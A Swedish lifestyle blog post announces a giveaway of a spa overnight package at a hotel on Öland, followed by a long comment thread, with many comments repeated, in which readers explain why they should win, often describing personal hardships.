TÄVLING SPAPAKET med övernattning!

Tävling

Hej Vännen! Nu ska vi äntligen köra denna efterlängtade Tävling! Ni som känner mig här genom bloggen vet om att jag älskar vardagslyx. Detta charmiga Hotell ligger bara ett par minuter ifrån min butik här på Öland och ca 7min ifrån Ölandsbron. Jag brukar ett par gånger om året åka ner och energiboosta hos dom! 

Nu har du chansen att vinna detta:

Spapaket Lycka:

 Övernattning 1 natt i en av våra minisviter med 1 spabehandling/person
Kaffebuffé med kaka under hela vistelsen.
En övernattning, inkl. frukost.
Entré till SPA-avdelningen med pool, bastu och jacuzzi.
Lån av badrock och handduk.
En behandling à 50 min. 
Välj mellan Spamassage, Aroma massage, Helkroppspeeling, Ansiktsbehandling Ideal Hydrating med Carita,

Avslappnande aromatisk ansiktsbehandling med Decléor, Djuprengöring, Makeuprådgivning.
Välkomstdrink.

 @skansenoland #skansenöland

Vem behöver inte få ro om sig själv och bli bortskämd i höstmörkret?!

För att vara med och tävla behöver du göra detta:

1: DELA detta blogginlägget på facebook.

2:Lägga en kommentar här på bloggen om varför just du skall vinna detta lyxiga vardagspaket!

3: Gilla deras facebook sida, som du hittar HÄR

Inte så svårt?! Man vinner inte om man inte tävlar…. Så vad väntar du på?! Stort LYCKA TILL!

bild(59)

Min morgon startade ganska bra, tills jag insåg att jag inte hade något kaffe hemma! Big NO NO! Jag satt och beklagade mig för min fina ”Kalmar fru” när jag sörplade på mitt te. Som genast bjöd över mig på en latte! 15min senare satt jag på hennes balkong och allting kändes såååå mycket bättre 😉  Tack vännen <3

Vi hörs senare! Puss & kram /My Martens

292 Komentarer

  1. Efter ett hektiskt år med kaos, flytt och massor av stress vill jag dela denna fantastiska vinst med min nya kärlek, då vi båda verkligen behöver detta!

    • Min man har haft ont i sin nacke i över två år, varit hos läkare, sjukgymnast och försökt med det mesta men värken vägrar ge sig. Det påverkar såklart både mig o barnen med. Jag och min man skulle verkligen behöva en spahelg tillsammans och bara få njuta ett slag

  2. Hej!
    Jag har länge velat åka iväg på ett spa bara för att få vara o samla energi men aldrig riktigt tagit tag i det. Så när ja fyllde 25 fick ja en övernattning på spa från min pojkvänn men han skulle boka det senare då vi inte hann den sommaren. Men ja är nu 26 och ett halvt och fortfarande aldrig vart på spa ? så nu tänkte ja att ja hoppas ja vinner här så kanske ja kan få en sån upplevelse ändå ?
    Tack för en fin blogg!
    Kram på er!

  3. Åh hade verkligen behövt unna mig lite vardagslyx, haft en motig höst mentalt o känner mig tömd på energi, känner att jag tappat bort mitt leende någonstans på vägen, o få unna mig en dag med spa behandling o få koppla av min stressade kropp skulle göra susen ❤️

  4. Ljuvlig tävling! Jag och min älskade pojkvän studerar båda och med CSN så vet alla att några extra kronor i slutet på månaden finns tyvärr inte över. Jag skulle vilja överraska min pojkvän med detta då vi firar 10 år tillsammans i november, vad vore bättre än att få tillbringa det tillsammans med honom på spa? Efter all slit med tentor och inlämningar behöver vi tid för oss själva. Skulle värma gott i ett studenthjärta att vinna detta, håller alla tummar ? stor kram till dig My!

  5. Om jag har turen att vinna skulle jag bjuda med min fina mamma. Hon är min stöttepelare i allt. Gått igenom en seperation med rättegång m.m min mamma hjälper mig ofantligt mycket både mig och min dotter på 1,5 år. Detta skulle vara så kul att få överraska henne som ett tack för allt hon gör för mig och min dotter:) håller tummarna

  6. Efter en tuff tid med minsta killen som varit sjuk o vi tillbringat tid på sjukhus och kommer göra i en omgång till hade det varit underbart att ladda batterierna o samla ny kraft här för mig o min man.

  7. Jag skulle vilja ta med min sambo som ett tack för att ha hjälp mig detta året när jag själv knappt orkat stå upp. För att han stöttat och är den mest omtänksamma och kärleksfullaste personen jag någonsin träffat. För att få komma bort och rå om varandra när vi knappt hunnit ses dom senaste månaderna pga jobbscheman som krockat, och ändå är vi sambos? För att få ladda lite energi inför vintern, den mörka och ibland lite jobbiga årstid. Utan stress och måsten.
    Hade suttit så fint och perfekt just nu♡

  8. Åh jag vill jättegärna vara med och hoppas på lite tur efter några hemska och jobbiga månader med bara massa otur. Skulle verkligen behöva komma bort och njuta lite med min man efter denna tuffa period så hoppas på lite tur nu.
    Har gillat och delat på fb. (veronica hedlund)
    Kram veronica

  9. Hej :)) Efter många års missbruk tidigare i mitt liv är jag nu drogfri. Det har varit en lång resa på alla sätt och vis.
    För fyra år sen vart jag utdömd som arbetsför av arbetsförmedlingen. Men med en kämparglöd och vilja har jag nu fast jobb sen 2 1/2 år tillbaka.
    Med jobb och inkomst kom nästa krig att vinna över. Skulder hos kronofogden som missbruk och misär fört med sig. Jag vet att det är jag som satt mig i den här situationen men det är inte lättare för det. Det är på ren vilja jag vänder på varenda krona jag har. Att gå till jobbet varje dag trots att det inte ens är roligt att få lön.
    Min dotters pappa avled i missbruket och där kom min vändpunkt.
    Jag har idag en ny kille. Som är otrolig med min dotter.
    Skulle ja vinna så skulle ja ta med mig honom. Det skulle få mig att orka frysa om mina fötter en vinter till. Kram Malin

  10. Mina föräldrar ställer alltid upp för mig och min familj, så att kunna få ge lite avkoppling tillbaka vi gärna vill. De hämtar på dagis och hjälper till i vårt hem så denna ljuvliga visit vill vi unna dem!

  11. Med en gubbe som jobbar borta å 5 barn å hund hemma i villan så känner jag att jag kan behöva lite vardagslyx. Hitta tid att andas och få ny energi i blodet! Stressa av lite å på så sätt bli en bättre mamma och matte, få känna mig omhändertagen!
    Ett plus e ju att det ligger så pass nära att mormor kan komma med bäbisen om han behöver matas! Å jag kan glatt lämna över honom med varm hand igen! ?

  12. Å en sådan lyx skulle vi alla behöva. Tänk att få komma bort ett tag byta miljö å jag och mannen får bli behandlade som en prinsessa och prins. Kanske även stöter på dig i din butik som jag är så nyfiken på ❤️

  13. Jag skulle verkligen behöva detta efter denna sensommar och höst.
    Har hänt en massa på jobbet o privat som gör att man verkligen skulle behöva slappna av. Och slippa ha axlarna alldeles under öronen ?

  14. efter att ha bott ett år långt från familj och vänner (barnvakter) och under den tiden fått vårt andra barn så skulle det vara underbart att åka på spa bara min man och jag ♥ länge sen vi haft någon tid för oss själva

  15. Det har varit många motgångar i mitt och min mans liv dom senaste 2 åren. Mest med huset, det har varit nära skilsmässa. Vi fick en stor vattenskada i källaren. Så min man fick pumpa ut vatten en gång i timmen dag som natt. Det tog väldigt mycket på hans krafter och jag och våra 2 barn fick bo hos mina föräldrar i 2 månader. Vilket han tyckte var väldigt jobbigt. Vara i från familjen så länge. Han fick nytt jobb i april i år. Och nu den senaste tiden så har han jobbat väldigt Mkt inför valet. Han är ombudsman och börjar 07.00 och är hemma allt från 17.00-22.00. Och han är alltid så trött när han kommer hem,vilket jag kan förstå så den här spa övernattningen hade han och jag verkligen behövt. Så man kan hämta nya krafter och ny energi. Bara koppla av och ta de lugnt. Inte tänka på något alls utan bara va. Hade varit så himla mysigt att överraska honom med detta om jag vinner. Tack från en väldigt trött mamma och pappa. Kramar till dig My

  16. Hade varit helt underbart att vinna denna spa weekend. Precis vad vi behöver efter en vår och sommar med en massa sjukdomar, massa rörigheter , släktingar som har blivit väldigt sjuka Känns som vi behöver den här lilla lyxen i vardagen igen för att komma upp på toppen igen ?

  17. Efter en tung sommar med hastig bortgång av älskad familjemedlem o tråkiga eftersviter av det samt extrem stress med högskolestudier vore det underbart att vinna lite lyx och avkoppling!

  18. Snälla låt mig vinna! Har aldrig testat spa och skulle verkligen behöva detta mitt i min sjukskrivning som utmattad. Ja, livet behöver vardagslyx och SKANSEN har ju omtalat spa och deras mat är grym.
    Snälla snälla snälla!!!

  19. Som politikerhustru ser man inte sin man många timmar under augusti och halva september då det är valår. Nu är valet över och jag tycker att både Henrik (min man) och jag är värda en natt tillsammans utan barn som kommer upp i sängen (även om det är hur mysigt som helst) och man ligger halvvägs ute på nattduksbordet. Skulle vara härligt att få rå om varandra och få krypa ner i en varm pool och bara få vara…

  20. Tror vi alla är värda detta härliga paket ? så min motivering är må bäste kvinna vinna ? jag skulle behöva en energikick utav dess like ? bli lite ompysslad helt enkelt! Kram på er och lycka till!!

  21. Med två busfrön hemma som jag älskar över allt annat, men som även kan få denna morsa hur sliten som helst. En grabb på nyss fyllda 4 år och en som snart fyller 5 år, det vill säga, det skiljer bara 11 månader mellan dom. Fullt upp här hemma och behöver verkligen lite egentid ? jag håller mina tummar, hårt!

  22. Skulle jag vinna så skulle jag överraska min älskade mamma med detta. Efter en mycket tuff vår/sommar med många hemska besked hade det varit mycket uppskattat! Kram och ta hand om varandra ❤️

  23. Efter ett hektiskt år med kaos, flytt och massor av stress vill jag dela denna fantastiska vinst med min nya kärlek, då vi båda verkligen behöver detta!

    • Min man har haft ont i sin nacke i över två år, varit hos läkare, sjukgymnast och försökt med det mesta men värken vägrar ge sig. Det påverkar såklart både mig o barnen med. Jag och min man skulle verkligen behöva en spahelg tillsammans och bara få njuta ett slag

  24. Hej!
    Jag har länge velat åka iväg på ett spa bara för att få vara o samla energi men aldrig riktigt tagit tag i det. Så när ja fyllde 25 fick ja en övernattning på spa från min pojkvänn men han skulle boka det senare då vi inte hann den sommaren. Men ja är nu 26 och ett halvt och fortfarande aldrig vart på spa 🙁 så nu tänkte ja att ja hoppas ja vinner här så kanske ja kan få en sån upplevelse ändå 🙂
    Tack för en fin blogg!
    Kram på er!

  25. Åh hade verkligen behövt unna mig lite vardagslyx, haft en motig höst mentalt o känner mig tömd på energi, känner att jag tappat bort mitt leende någonstans på vägen, o få unna mig en dag med spa behandling o få koppla av min stressade kropp skulle göra susen ❤️

  26. Ljuvlig tävling! Jag och min älskade pojkvän studerar båda och med CSN så vet alla att några extra kronor i slutet på månaden finns tyvärr inte över. Jag skulle vilja överraska min pojkvän med detta då vi firar 10 år tillsammans i november, vad vore bättre än att få tillbringa det tillsammans med honom på spa? Efter all slit med tentor och inlämningar behöver vi tid för oss själva. Skulle värma gott i ett studenthjärta att vinna detta, håller alla tummar 🙂 stor kram till dig My!

  27. Jag vill vinna, skulle vara så skönt att få lyxa till vardagen lite. Tänk vad skönt att få samla på sig ny energi så man kan fortsätta vara världens bästa mamma :)♥♥♥. Vill inte mannen följ med så får det bli bästisen som får följa med.

  28. jag har precis fått veta att jag är påväg att få anorexia lider av ångest och inre stress detta skulle jag verkligen behöva nu efter allt skit jag gått/går igenom.

  29. Åh lite lyx hade behövts. Min sambo och jag firar nu idag faktiskt 2 år tillsammans, vi har hunnit med barn och en långvägnad flytt. Har även precis fått fast jobb så att fira med detta och njuta lite hade varit fantastiskt

  30. Om jag har turen att vinna skulle jag bjuda med min fina mamma. Hon är min stöttepelare i allt. Gått igenom en seperation med rättegång m.m min mamma hjälper mig ofantligt mycket både mig och min dotter på 1,5 år. Detta skulle vara så kul att få överraska henne som ett tack för allt hon gör för mig och min dotter:) håller tummarna

  31. Efter en tuff tid med minsta killen som varit sjuk o vi tillbringat tid på sjukhus och kommer göra i en omgång till hade det varit underbart att ladda batterierna o samla ny kraft här för mig o min man.

  32. Hade varit skönt med lite lyx tillsammans med mannen i mitt liv, inte lätt att hinna med sig själv när man är småbarnsförälder, så det hade suttit fint med en spalvernattning

  33. Jag skulle vilja ta med min sambo som ett tack för att ha hjälp mig detta året när jag själv knappt orkat stå upp. För att han stöttat och är den mest omtänksamma och kärleksfullaste personen jag någonsin träffat. För att få komma bort och rå om varandra när vi knappt hunnit ses dom senaste månaderna pga jobbscheman som krockat, och ändå är vi sambos? För att få ladda lite energi inför vintern, den mörka och ibland lite jobbiga årstid. Utan stress och måsten.
    Hade suttit så fint och perfekt just nu♡

  34. Trött småbarnsförälder som tycker att livet rusar iväg och jag jagar efter. Vi lever bara en gång, vi måste försöka ta vara på livet och njuta så mycket vi kan. Därför vore det underbart om jag och min man fick åka iväg utan barn och få kvalitetstid med varandra och bli lite ompysslade.

  35. Åh jag vill jättegärna vara med och hoppas på lite tur efter några hemska och jobbiga månader med bara massa otur. Skulle verkligen behöva komma bort och njuta lite med min man efter denna tuffa period så hoppas på lite tur nu.

    Har gillat och delat på fb. (veronica hedlund)

    Kram veronica

  36. Hej :)) Efter många års missbruk tidigare i mitt liv är jag nu drogfri. Det har varit en lång resa på alla sätt och vis.
    För fyra år sen vart jag utdömd som arbetsför av arbetsförmedlingen. Men med en kämparglöd och vilja har jag nu fast jobb sen 2 1/2 år tillbaka.
    Med jobb och inkomst kom nästa krig att vinna över. Skulder hos kronofogden som missbruk och misär fört med sig. Jag vet att det är jag som satt mig i den här situationen men det är inte lättare för det. Det är på ren vilja jag vänder på varenda krona jag har. Att gå till jobbet varje dag trots att det inte ens är roligt att få lön.
    Min dotters pappa avled i missbruket och där kom min vändpunkt.
    Jag har idag en ny kille. Som är otrolig med min dotter.
    Skulle ja vinna så skulle ja ta med mig honom. Det skulle få mig att orka frysa om mina fötter en vinter till. Kram Malin

  37. Mina föräldrar ställer alltid upp för mig och min familj, så att kunna få ge lite avkoppling tillbaka vi gärna vill. De hämtar på dagis och hjälper till i vårt hem så denna ljuvliga visit vill vi unna dem!

  38. Med en gubbe som jobbar borta å 5 barn å hund hemma i villan så känner jag att jag kan behöva lite vardagslyx. Hitta tid att andas och få ny energi i blodet! Stressa av lite å på så sätt bli en bättre mamma och matte, få känna mig omhändertagen!
    Ett plus e ju att det ligger så pass nära att mormor kan komma med bäbisen om han behöver matas! Å jag kan glatt lämna över honom med varm hand igen! 🙂

  39. Å en sådan lyx skulle vi alla behöva. Tänk att få komma bort ett tag byta miljö å jag och mannen får bli behandlade som en prinsessa och prins. Kanske även stöter på dig i din butik som jag är så nyfiken på ❤️

  40. Jag skulle verkligen behöva detta efter denna sensommar och höst.
    Har hänt en massa på jobbet o privat som gör att man verkligen skulle behöva slappna av. Och slippa ha axlarna alldeles under öronen 🙁

  41. efter att ha bott ett år långt från familj och vänner (barnvakter) och under den tiden fått vårt andra barn så skulle det vara underbart att åka på spa bara min man och jag ♥ länge sen vi haft någon tid för oss själva

  42. Jag och min man gifte oss i somras, men med barn jobb& studier så har en bröllopsnatt inte lyckats bli av. Detta är en chans att få den tiden tillsammans ?

  43. Det har varit många motgångar i mitt och min mans liv dom senaste 2 åren. Mest med huset, det har varit nära skilsmässa. Vi fick en stor vattenskada i källaren. Så min man fick pumpa ut vatten en gång i timmen dag som natt. Det tog väldigt mycket på hans krafter och jag och våra 2 barn fick bo hos mina föräldrar i 2 månader. Vilket han tyckte var väldigt jobbigt. Vara i från familjen så länge. Han fick nytt jobb i april i år. Och nu den senaste tiden så har han jobbat väldigt Mkt inför valet. Han är ombudsman och börjar 07.00 och är hemma allt från 17.00-22.00. Och han är alltid så trött när han kommer hem,vilket jag kan förstå så den här spa övernattningen hade han och jag verkligen behövt. Så man kan hämta nya krafter och ny energi. Bara koppla av och ta de lugnt. Inte tänka på något alls utan bara va. Hade varit så himla mysigt att överraska honom med detta om jag vinner. Tack från en väldigt trött mamma och pappa. Kramar till dig My

  44. Hade varit helt underbart att vinna denna spa weekend. Precis vad vi behöver efter en vår och sommar med en massa sjukdomar, massa rörigheter , släktingar som har blivit väldigt sjuka Känns som vi behöver den här lilla lyxen i vardagen igen för att komma upp på toppen igen 🙂

  45. Lite mys i höstmökret ihop med min man. Vi har varit gifta i 45 år för en månad sedan.Skulle vilja överraska honom med en vistelse på Skansen. Fast vi har vårt smultronställe på Öland så är det inte fel att få lite lyx i vardagen.

  46. Efter en tung sommar med hastig bortgång av älskad familjemedlem o tråkiga eftersviter av det samt extrem stress med högskolestudier vore det underbart att vinna lite lyx och avkoppling!

  47. Snälla låt mig vinna! Har aldrig testat spa och skulle verkligen behöva detta mitt i min sjukskrivning som utmattad. Ja, livet behöver vardagslyx och SKANSEN har ju omtalat spa och deras mat är grym.

    Snälla snälla snälla!!!

  48. Som politikerhustru ser man inte sin man många timmar under augusti och halva september då det är valår. Nu är valet över och jag tycker att både Henrik (min man) och jag är värda en natt tillsammans utan barn som kommer upp i sängen (även om det är hur mysigt som helst) och man ligger halvvägs ute på nattduksbordet. Skulle vara härligt att få rå om varandra och få krypa ner i en varm pool och bara få vara…

  49. Tror vi alla är värda detta härliga paket 🙂 så min motivering är må bäste kvinna vinna 😉 jag skulle behöva en energikick utav dess like 😉 bli lite ompysslad helt enkelt! Kram på er och lycka till!!

  50. Med två busfrön hemma som jag älskar över allt annat, men som även kan få denna morsa hur sliten som helst. En grabb på nyss fyllda 4 år och en som snart fyller 5 år, det vill säga, det skiljer bara 11 månader mellan dom. Fullt upp här hemma och behöver verkligen lite egentid 🙂 jag håller mina tummar, hårt!

  51. Skulle jag vinna så skulle jag överraska min älskade mamma med detta. Efter en mycket tuff vår/sommar med många hemska besked hade det varit mycket uppskattat! Kram och ta hand om varandra ❤️

  52. Jag vill vinna, skulle vara så skönt att få lyxa till vardagen lite. Tänk vad skönt att få samla på sig ny energi så man kan fortsätta vara världens bästa mamma :)♥♥♥. Vill inte mannen följ med så får det bli bästisen som får följa med.

  53. jag har precis fått veta att jag är påväg att få anorexia lider av ångest och inre stress detta skulle jag verkligen behöva nu efter allt skit jag gått/går igenom.

  54. Åh lite lyx hade behövts. Min sambo och jag firar nu idag faktiskt 2 år tillsammans, vi har hunnit med barn och en långvägnad flytt. Har även precis fått fast jobb så att fira med detta och njuta lite hade varit fantastiskt

  55. Hade varit skönt med lite lyx tillsammans med mannen i mitt liv, inte lätt att hinna med sig själv när man är småbarnsförälder, så det hade suttit fint med en spalvernattning

  56. Trött småbarnsförälder som tycker att livet rusar iväg och jag jagar efter. Vi lever bara en gång, vi måste försöka ta vara på livet och njuta så mycket vi kan. Därför vore det underbart om jag och min man fick åka iväg utan barn och få kvalitetstid med varandra och bli lite ompysslade.

  57. Att få vinna detta vore helt underbart <3 Både jag och sambon är ännu studenter och väntar ett efterlängtat barn till nästa år <3 Pengarna finns alltså inte just nu till att unna oss något sånt här och det vore så underbart med den avkopplingen innan bebben kommer. I somras var vi på Öland då min sambos mamma flyttat till Kalmar och vi båda förälskade oss i dessa ställen. Skulle bli så glad av att få vinna det här ?

  58. Ååå, detta skulle jag vilja vinna då jag har en tuff tid.
    jag skulle behöva komma iväg med sambon och bara få ro om mig själv och va ensam med honom.
    Detta kanske ger en gnista till kärleken igen ?

  59. Jag och min man gifte oss i somras, men med barn jobb& studier så har en bröllopsnatt inte lyckats bli av. Detta är en chans att få den tiden tillsammans 🙂

  60. Lite mys i höstmökret ihop med min man. Vi har varit gifta i 45 år för en månad sedan.Skulle vilja överraska honom med en vistelse på Skansen. Fast vi har vårt smultronställe på Öland så är det inte fel att få lite lyx i vardagen.

  61. Spa har jag aldrig testat på,
    därför håller jag tummarna för att detta få.
    Ny kärlek jag i min famn,
    så vore underbart att överraska honom genom att detta ro iland ?
    Följer, delar och taggar på IG i användarnamn Mizzyz78
    Hälsningar Frida

  62. Skulle vara underbart att vinna detta, så skulle jag ta med min älskade vän på detta! Hon har haft ett enormt tufft år och jobbar stenhårt med att hitta tillbaks till sitt nya jag!! Det är inte lätt stå bredvid och se sin bästa vän må dåligt och inte kunna hjälpa mer än att bara finnas!!! Så detta skulle vara min gåva till henne i försök att hitta inre frid! <3 om så bara en dags vila och avslappning!

  63. Jag är en nybliven 20 årig tjej som länge tänkt att jag ska gå på spa men det har aldrig blivit av då jag har känt att jag inte har tid. Då man har ett jobb att gå till 7-16 varje dag, hållt på med körkortet som jag fick samma vecka som min födelsedag och sen dansar jag efter jobbet så det skulle vara så sjukt skönt att få gå på spa, koppla av och få underbar ryggmassage mot min smärtande rygg. Detta har jag haft ett bra tag och jag tror att det är pga mitt yrke då jag är målare.
    Om jag hade vunnit detta spa paket hade jag blivit så otroligt glad och jag hade njutit till max. Det skulle även vara kul att fira på detta sätt min födelsedag i efterskott och att jag fick mitt körkort.
    Håller tummarna nu! ?

  64. Hej, ladda upp mina batterier igen, ensamstående med 2 söner, jobbar natt heltid, pluggar heltid på distans för att kunna få ett fast jobb med det jag tycker är underbart givande, inom vården (som undersköterska), och barnens fritidsintressen, skola o så ta hand om allt som ska tas hand om i hemmet, glömmer som bort mig själv i det hela!

  65. Det skulle vara underbart att vinna!jag skulle ta med min dotter som är 15 år,vill verkligen ha egentid med henne och spa skulle vara perfekt!

  66. För att koppla av med ljus, mys och spa,
    då skulle jag bli gla’.
    Njuta i vintertid,
    få känna en inre frid.
    På hemvägen stanna vid en MYsig, godhjärtad brud,
    säga hej och tack, köpa en blomma eller skrud.

  67. Att få vinna detta vore helt underbart <3 Både jag och sambon är ännu studenter och väntar ett efterlängtat barn till nästa år <3 Pengarna finns alltså inte just nu till att unna oss något sånt här och det vore så underbart med den avkopplingen innan bebben kommer. I somras var vi på Öland då min sambos mamma flyttat till Kalmar och vi båda förälskade oss i dessa ställen. Skulle bli så glad av att få vinna det här 🙂

  68. Hej! Detta är precis vad jag och min fina sambo skulle behöva. Vi har en väldigt pressad vardag, han jobbar oftast 10-12 timmars pass och kommer hem sent på kvällen när vi inte har sonen. Vi har sambons son på deltid och njuter då av lilleman. Men vi skulle behöva komma iväg på tumanhand och bara njuta.Tyvärr har båda ganska dåligt betalda jobb så att vi har svårt att unna oss denna lyxen utan planering.
    Tack för en underbar blogg My, du är verkligen en förebild!

  69. Jag tycker att jag förtjänar lite extra lyx i vardagen, då jag är en ensamstående mamma på 23 år. Jag jobbar hårt varje dag i hemtjänsten på öland för att ”mina” gamla ska ha det så bra som möjligt & jag jobbar hårt för min lilla sons skull. Han är snart 2 år ? detta är exakt vad jag skulle behöva ♡

  70. Ååå, detta skulle jag vilja vinna då jag har en tuff tid.
    jag skulle behöva komma iväg med sambon och bara få ro om mig själv och va ensam med honom.
    Detta kanske ger en gnista till kärleken igen 🙂

  71. Spa har jag aldrig testat på,
    därför håller jag tummarna för att detta få.
    Ny kärlek jag i min famn,
    så vore underbart att överraska honom genom att detta ro iland 🙂

    Följer, delar och taggar på IG i användarnamn Mizzyz78

    Hälsningar Frida

  72. Skulle vara underbart att vinna detta, så skulle jag ta med min älskade vän på detta! Hon har haft ett enormt tufft år och jobbar stenhårt med att hitta tillbaks till sitt nya jag!! Det är inte lätt stå bredvid och se sin bästa vän må dåligt och inte kunna hjälpa mer än att bara finnas!!! Så detta skulle vara min gåva till henne i försök att hitta inre frid! <3 om så bara en dags vila och avslappning!

  73. Jag är en nybliven 20 årig tjej som länge tänkt att jag ska gå på spa men det har aldrig blivit av då jag har känt att jag inte har tid. Då man har ett jobb att gå till 7-16 varje dag, hållt på med körkortet som jag fick samma vecka som min födelsedag och sen dansar jag efter jobbet så det skulle vara så sjukt skönt att få gå på spa, koppla av och få underbar ryggmassage mot min smärtande rygg. Detta har jag haft ett bra tag och jag tror att det är pga mitt yrke då jag är målare.
    Om jag hade vunnit detta spa paket hade jag blivit så otroligt glad och jag hade njutit till max. Det skulle även vara kul att fira på detta sätt min födelsedag i efterskott och att jag fick mitt körkort.
    Håller tummarna nu! 🙂

  74. Hej, ladda upp mina batterier igen, ensamstående med 2 söner, jobbar natt heltid, pluggar heltid på distans för att kunna få ett fast jobb med det jag tycker är underbart givande, inom vården (som undersköterska), och barnens fritidsintressen, skola o så ta hand om allt som ska tas hand om i hemmet, glömmer som bort mig själv i det hela!

  75. Åh vad detta låter super härligt ! När man e full med värk reumatiskt o fibromyalgie så hade detta varit underbart att få komma till o koppla av o njuta ! O när man har varit ensammstående mamma till 3 barn som i dag gett mig 2 helt fantastiska barnbarn som jag gärna försöker att ställa upp för trots min värk ? Men barn lär sig snabbt vad man kan göra med dom o hur mycket man orkar trots daglig smärta <3 Hoppas så på turen <3

  76. Det skulle vara underbart att vinna!jag skulle ta med min dotter som är 15 år,vill verkligen ha egentid med henne och spa skulle vara perfekt!

  77. Hej !!
    Det skulle vara sååå sköönt att få åka iväg med mannen i mitt liv <3 på en mini semester, har 6 barn mellan 12 och 11 månader så man kan säga att vi INTE får någon egen tid ? …älska barnen, men man behöver även sköta mannen som man älskar och hålla lågan öppen, ej heller har vi några extra pengar till något Lyxigt som en övernattning på hotell. Ett + att få komma över till vårt fina grannland och hälsa på dig My och alla andra trevliga svenskar. <3
    Ha det bra.

  78. För att koppla av med ljus, mys och spa,
    då skulle jag bli gla’.
    Njuta i vintertid,
    få känna en inre frid.
    På hemvägen stanna vid en MYsig, godhjärtad brud,
    säga hej och tack, köpa en blomma eller skrud.

  79. Hej! Detta är precis vad jag och min fina sambo skulle behöva. Vi har en väldigt pressad vardag, han jobbar oftast 10-12 timmars pass och kommer hem sent på kvällen när vi inte har sonen. Vi har sambons son på deltid och njuter då av lilleman. Men vi skulle behöva komma iväg på tumanhand och bara njuta.Tyvärr har båda ganska dåligt betalda jobb så att vi har svårt att unna oss denna lyxen utan planering.
    Tack för en underbar blogg My, du är verkligen en förebild!

  80. Efter att jobbat 200 timmar övertid på 5-6 månader och ändå ansvarat för 2 pojklag i fotboll vilket är minst 5 pass i veckan och snart ska vi även flytta till hus. Så jag tycker att min sambo och jag behöver koppla av tillsammans eftersom vi knappt träffas.

  81. Jag vill vinna detta för att jag trivs SÅ bra på Skansen och jag skulle vilja ta med en av mina vänner som har ställt upp för mig och hon behöver komma iväg. Då vill jag visa henne detta guldkornet på vår underbara ö!

  82. Jag tycker att jag förtjänar lite extra lyx i vardagen, då jag är en ensamstående mamma på 23 år. Jag jobbar hårt varje dag i hemtjänsten på öland för att ”mina” gamla ska ha det så bra som möjligt & jag jobbar hårt för min lilla sons skull. Han är snart 2 år 🙂 detta är exakt vad jag skulle behöva ♡

  83. Ölandsdrömmar, kanske ett provsmak en natt, tills hemkänslan kommer, då vi kan njuta av stunden, havet och lunden. Vore toppen! ?

  84. Sliten mamma som jobbar jämt
    Som ensamstående blir gulkanten på tillvaron ett skämt
    Vore underbart att komma bort från vardagen ett tag
    Och rå om sig själv för en dag

  85. Kan nog egentligen inte beskriva hur mkt jag/vi behöver detta.
    Vi har haft en tuff tid, men nu är jag nyopererad och hoppas att min värk ska bli bättre och därmed humöret

  86. Saknar mitt underbara Öland
    Många mil i mellan oss men en resa ner och få skämma bort sig lite skulle vara härligt.
    Så kan jag passa på att få träffa lite vänner när jag kommer ner.

  87. Hej! Detta skulle verkligen sitta fint! Har absolut ingen vardagslyx i mitt liv känns det som. Fast i ekorrhjulet med jobb, lämning & hämtning på dagis och skola. Städa, handla, tvätta… Vill ha lite mer guldkant på min vardag, men har svårt att få till det. Tiden räcker liksom inte till… Är ny läsare av din blogg, gillar den väldigt mycket ! Tack för att du delar med dej av ditt liv ?

  88. Är gravid med vårt tredje barn och jag är mitt uppe i en period där jag är helt tömd på energi och ork. Har massa dåligt samvete för mina barn som jag inte orkar vara den bästa mamman till just nu. Min sambo får göra allt och lite till hemma och samtidigt stå ut med mina ”hormonsutbrott”. Vi skulle verkligen behöva en dag ifrån barnen med bara varandra där vi får samla energi och bara mysa.

  89. Ska någon få åka på ett lite lyx med massage och annat mys så vill jag att min dotter ska få åka tillsammans med mig. Hon har önskat sig massage på något fint ställe i flera år. Hon är en så fin tjej som alltid vill sina vänner väl. Drömmen att ge henne detta har alltid funnits där men pengarna har trytit.

  90. Jag har sedan 15 år tillbaka en svår whiplash skada som även utvecklat fibromyalgi, Never i kläm i vä höft, vilket leder till bortdomningar i benet, vilket jag även har i vä arm. Nu är jag heltids sjukskriven, värken är så mycket värre, gå inte att beskriva denna smärta som jag lever med varje dag dygnet runt. Vilket inte blir mycket sömn. Tappar humöret lätt, blir ledsen lätt, deprimerad. Idag har jag varit på smärtkliniken igen i Västervik, ingen rolig bilfärd dit fick stanna flera gånger då jag inte hade någon som kunde följa med. Fick tio kortison och bedövnings sprutor på mina olika smärtområden. Nya kompletterande mediciner till dem jag redan tar, vill säga många tabletter per dag vilket jag avskyr men måste. Jag skulle verkligen bli överlycklig av att få vinna detta, där ja kan bli omhändertagen, få slappna av i varmt bad och bastu, ta en varsam massage! Jag håller tummarna hårt!

  91. WOOOW!! Vilken underbart härlig vinst, den skulle jag bli superlycklig om jag fick chansen att njuta av tillsammans med en kär vän, varför ska just jag vinna den då?? ja jag är väl inte så speciell eller märkvärdig på något sätt, men jag vill fira att jag är ”på banan” igen, jag som är sjuksköterskan som själv blev sjuk, för att jag inte tog lika väl hand om mig själv som jag gjorde om mina patienter, så till slut var batterierna heeeelt urladdade, och de gick inte att ladda om hur jag än försökte, till slut sade jag upp mig från mitt arbete som jag arbetat med i nästan 25 år och började att träna både mentalt och fysiskt med Power Walks på en mil om dagen, 13 kilos övervikt bort och lugnet och glädjen in sedan var jag så pass frisk så jag kunde börja att arbeta igen men i en Delikatessbutik, här hade allt tungt ansvar och stress bytts ut mot glada hungriga kunder, ja det var ju lite lättsammare, det enda som inte är positivt är ju att jag tjänar ca 6-7 tusen kronor mindre i månaden, men vad gör det??? när glädjen och hälsan är tillbaka???? så jag vill fira min återkomst till livet som så sakta höll på att rinna i från mig , med en härlig spa weekend på underbara Öland ?
    Jag har gillat deras fb sida under mitt namn Christina Frisberg.
    Jag har delat tävlingsinlägget offentligt under samma namn.
    Jag sänder över kramar till alla som vill, törs och behöver. ?

  92. Åh vilken generös tävling, är sönderstressad pga flytt o jättesjuk svärfar som pendlat mellan liv o död, vakat på sjukhuset hela sommaren – tappar hår o är bara allmänt körd i botten…
    Har ALDRIG nånsinn gjort nån spa behandling så det vore lyx, lyx för mig..
    Gillar sidorna o delat inlägget…
    Hoppfull kram fr mig

  93. Jag är gravid V 32. Har haft magsjuka, veckan efter det blev jag jag förkyld och sen blev jag förkyld igen efter 1, 5 vecka. Sen augusti har jag haft kraft sammandragningar och mycket foglossning, så har varit jobbigt allt detta.

